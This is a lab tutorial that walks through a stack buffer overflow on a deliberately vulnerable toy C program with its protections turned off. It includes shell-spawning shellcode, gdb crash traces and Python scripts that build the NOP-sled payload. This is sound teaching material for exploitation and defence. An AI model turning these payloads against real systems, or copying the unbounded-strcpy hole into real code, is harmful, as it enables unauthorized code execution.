To make the exercise go smoothly, Stack Guard, Stack Space Randomization and the Non-Executable Stack all have to be disabled first. The target program:

csep@ubuntu:~/src$ cat samp1.c
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv){
    char buffer[500];
    strcpy(buffer, argv[1]); // Vulnerable Function: no bounds check, argv[1] may exceed 500 bytes
    return 0;
}
1. Disable Stack Space Randomization (ASLR)
root@ubuntu:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@ubuntu:~# cat /proc/sys/kernel/randomize_va_space
0
2. Disable Stack Guard (the stack canary) by adding a flag when compiling with gcc. The addresses below (0xbffff...) come from a 32-bit Ubuntu; on a 64-bit host add -m32 as well.
gcc -g -o samp1 samp1.c -fno-stack-protector
3. Disable the Non-Executable Stack: the binary's stack must also be marked executable (NX cleared), which execstack does by rewriting the PT_GNU_STACK program header
user@ubuntu:~/src$ sudo apt-get install execstack
...
user@ubuntu:~/src$ execstack -s samp1
Compiling with gcc -z execstack has the same effect; either way, readelf -l samp1 | grep GNU_STACK should now show RWE.
4. Run GDB and start the Buffer Overflow
Feed the program longer and longer arguments: once the length passes about 504 the input reaches EIP; then check roughly where ESP is. (The one-liners below are Python 2, whose print writes the string bytes out as-is.)
csep@ubuntu:~/src$ gdb -q samp1
Reading symbols from /home/csep/src/samp1...done.
(gdb) run `python -c 'print "\x41"*500'`
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*500'`
Program exited normally.
(gdb) run `python -c 'print "\x41"*520'`
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*520'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `python -c 'print "\x41"*512'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*512'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `python -c 'print "\x41"*508'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*508'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `python -c 'print "\x41"*504'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*504'`
Program received signal SIGILL, Illegal instruction.
0xbffff67a in ?? ()
From 508 bytes on EIP is entirely 0x41414141, while at 504 the fault changes (SIGILL at a stack address) because strcpy's terminating NUL lands on the saved return address instead of an 'A': the return address occupies offsets 504 to 507. Next, set a breakpoint on the strcpy line, run the 508-byte input again, and read ESP after the crash. An address about 300 bytes below that ESP is what we will put into the return-address slot, so that the jump lands inside the NOP sled.
(gdb) list
1 #include
2 #include
3
4 int main(int argc, char** argv){
5 char buffer[500];
6 strcpy(buffer, argv[1]); // Vulnerable Function
7 return 0;
8 }
(gdb) b 6
Breakpoint 1 at 0x80483cd: file samp1.c, line 6.
(gdb) run `python -c 'print "\x41"*508'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*508'`
Breakpoint 1, main (argc=2, argv=0xbffff604) at samp1.c:6
6 strcpy(buffer, argv[1]); // Vulnerable Function
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r esp
esp 0xbffff560 0xbffff560
(gdb) p /x 0xbffff560 - 300
$3 = 0xbffff434
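Bisecting with 500/520/512/508/504 'A's works, but an all-'A' input cannot say which four of them landed in EIP. A cyclic pattern identifies the offset from a single crash. The following is an added example (Python 3), not code from the original page or from the author's tools; the function names cyclic_pattern, eip_offset and offset_is_unambiguous are my own.

```python
import struct

# Added example, not from the original page: a Metasploit-style cyclic
# pattern replaces the page's trial runs with 500/520/512/508/504 'A's.


def cyclic_pattern(length):
    """Build the classic 'Aa0Aa1Aa2...' pattern, truncated to `length` bytes.

    Every 4-byte window is unique within the first 20280 bytes, so the value
    that ends up in EIP identifies exactly where in the input it came from.
    The pattern contains no NUL byte, so strcpy() copies all of it.
    """
    if length > 20280:
        raise ValueError("pattern repeats after 20280 bytes")
    chunks = []
    for upper in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in "abcdefghijklmnopqrstuvwxyz":
            for digit in "0123456789":
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length].encode("ascii")
    return "".join(chunks)[:length].encode("ascii")


def eip_offset(pattern, eip_value):
    """Return the offset in `pattern` of the 4 bytes that landed in EIP.

    `eip_value` is the integer gdb printed (e.g. 0x41387141); it is packed
    little-endian because that is the order x86 stored it on the stack.
    """
    needle = struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value %#x does not come from this pattern" % eip_value)
    return idx


def offset_is_unambiguous(pattern, eip_value):
    """True only if the EIP bytes occur once in the input.

    For the page's b'A' * 520 and EIP 0x41414141 this is False: the 'A's
    give no information about the offset, which is why the page bisects.
    """
    needle = struct.pack("<I", eip_value)
    return pattern.count(needle) == 1


if __name__ == "__main__":
    import sys
    # Send this as argv[1] (e.g. ./samp1 "$(python3 pattern.py)"), read the
    # faulting EIP from gdb, then call eip_offset(cyclic_pattern(520), eip).
    sys.stdout.buffer.write(cyclic_pattern(520))
```

With a 520-byte pattern the bytes at offset 504 are "Aq8A", so a crash at EIP 0x41387141 maps straight back to offset 504, the value the page reaches after four extra runs.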
Next, prepare the shellcode (see the linked reference).
csep@ubuntu:~/src$ ./sc-gen sh
Shellcode lenght: 54
\x31\xc0\x83\xec\x01\x88\x04\x24
\x68\x74\x72\x69\x62\x68\x2e\x64
\x69\x73\x68\x6e\x2f\x73\x68\x66
\x68\x62\x69\x83\xec\x01\xc6\x04
\x24\x2f\x89\xe6\x50\x56\xb0\x0b
\x89\xf3\x89\xe1\x31\xd2\xcd\x80
\xb0\x01\x31\xdb\xcd\x80
csep@ubuntu:~/src$ for line in `./sc-gen sh | grep "x"`; do echo -n $line; done
\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x74\x72\x69\x62\x68\x2e\x64\x69\x73\x68\x6e\x2f\x73\x68\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80
These 54 bytes contain no NUL (strcpy would stop at one). They push the path string /bin/sh.distrib onto the stack, execve() it through int 0x80 with an empty environment, and then call exit(); on this system that path is bash, as the gdb output at the end shows. Everything is now in place for the overflow. The argument to send is laid out like this:
[NOP-------] [shell Code] [return Address----]
^--------------------------------------'
As long as the return address points somewhere inside the NOP sled, execution slides down into the shellcode.
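The page assembles the payload by hand as "\x90"*302 + shellcode + "\xc4\xf3\xff\xbf"*38 and picks the return address by eye. The following is an added example (Python 3), not code from the original page or from the author's tools, that builds the same layout and checks the two things that silently break it: a NUL byte anywhere (strcpy truncates there) and a return-address copy that does not line up with the slot at offset 504. The function names layout, build_payload, buffer_start_from_esp and ret_lands_in_sled are my own; the shellcode bytes and the ESP value 0xbffff560 are copied from the page.

```python
import struct
import sys

# Added example, not from the original page: builds and sanity-checks the
# [NOP sled][shellcode][return address * N] layout the page assembles by hand.

# The 54 shellcode bytes printed by sc-gen above, copied from the page.
SHELLCODE = bytes.fromhex(
    "31c083ec01880424" "6874726962682e64" "6973686e2f736866"
    "68626983ec01c604" "242f89e65056b00b" "89f389e131d2cd80"
    "b00131dbcd80"
)


def layout(ret_offset, shellcode_len, total_len, ret_copies):
    """Return (nop_len, tail_start) for the layout, or raise if no complete
    4-byte copy of the return address would cover the slot at ret_offset."""
    tail_len = 4 * ret_copies
    nop_len = total_len - shellcode_len - tail_len
    if nop_len < 0:
        raise ValueError("shellcode and return addresses do not fit in total_len")
    tail_start = nop_len + shellcode_len
    if not tail_start <= ret_offset <= total_len - 4 or (ret_offset - tail_start) % 4:
        raise ValueError("no complete copy of the return address lands on offset %d" % ret_offset)
    return nop_len, tail_start


def build_payload(ret_addr, ret_offset=504, shellcode=SHELLCODE, total_len=508, ret_copies=38):
    """[NOP sled][shellcode][ret_addr little-endian * ret_copies], total_len bytes."""
    nop_len, _ = layout(ret_offset, len(shellcode), total_len, ret_copies)
    ret = struct.pack("<I", ret_addr)
    payload = b"\x90" * nop_len + shellcode + ret * ret_copies
    # strcpy() stops at the first NUL, so a NUL anywhere truncates the payload.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy() would truncate it")
    return payload


def buffer_start_from_esp(esp_after_ret, ret_offset):
    """gdb's ESP after the crash points just past the popped return-address
    slot; the slot is at esp-4 and the buffer begins ret_offset bytes below it."""
    return esp_after_ret - 4 - ret_offset


def ret_lands_in_sled(ret_addr, buffer_start, nop_len):
    """True if jumping to ret_addr starts execution inside the NOP sled."""
    return buffer_start <= ret_addr < buffer_start + nop_len


if __name__ == "__main__":
    # Values from the page: ESP 0xbffff560 after the 508-byte crash, slot at offset 504.
    start = buffer_start_from_esp(0xbffff560, 504)
    nop_len, _ = layout(504, len(SHELLCODE), 508, 38)
    target = start + nop_len // 2   # aim for the middle of the sled for maximum slack
    payload = build_payload(target)
    sys.stderr.write("buffer at %#x, sled %#x-%#x, jumping to %#x\n"
                     % (start, start, start + nop_len - 1, target))
    # Raw bytes on stdout, usable as:  (gdb) run "$(python3 payload.py)"
    sys.stdout.buffer.write(payload)
```

With the page's numbers the buffer starts at 0xbffff364 and the sled covers 0xbffff364 to 0xbffff491, so both the computed 0xbffff434 and the 0xbffff3c4 actually used are valid targets, while an address such as 0xbffff300 is rejected because its low byte is NUL. Under Python 3 write the bytes with sys.stdout.buffer.write rather than print, which would re-encode bytes above 0x7f as UTF-8.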
The payload is "\x90"*302 (the NOP sled), the 54-byte shellcode, and "\xc4\xf3\xff\xbf"*38, which is 0xbffff3c4 in little-endian byte order: 508 bytes in total, so the 38th copy of the address sits exactly on the return-address slot at offset 504. 0xbffff3c4 is 412 bytes below the ESP read above rather than 300, but it still falls inside the 302-byte sled (the buffer starts at 0xbffff560 - 4 - 504 = 0xbffff364), and any address in the sled works. Run it and we get a shell:
(gdb) run `python -c 'print "\x90"*302+"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x74\x72\x69\x62\x68\x2e\x64\x69\x73\x68\x6e\x2f\x73\x68\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"+"\xc4\xf3\xff\xbf"*38'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/csep/src/samp1 `python -c 'print "\x90"*302+"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x74\x72\x69\x62\x68\x2e\x64\x69\x73\x68\x6e\x2f\x73\x68\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"+"\xc4\xf3\xff\xbf"*38'`
Breakpoint 1, main (argc=2, argv=0xbffff604) at samp1.c:6
6 strcpy(buffer, argv[1]); // Vulnerable Function
(gdb) c
Continuing.
process 13123 is executing new program: /bin/bash
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
To run a command as administrator (user "root"), use "sudo".
See "man sudo_root" for details.
csep@ubuntu:/home/csep/src$
Boom! We have a shell. It came up inside gdb, though: outside gdb the stack addresses shift a little (gdb puts LINES and COLUMNS into the environment, and the path in argv[0] differs), so when running ./samp1 directly the target address may need re-deriving. The NOP sled is what gives slack against such small shifts.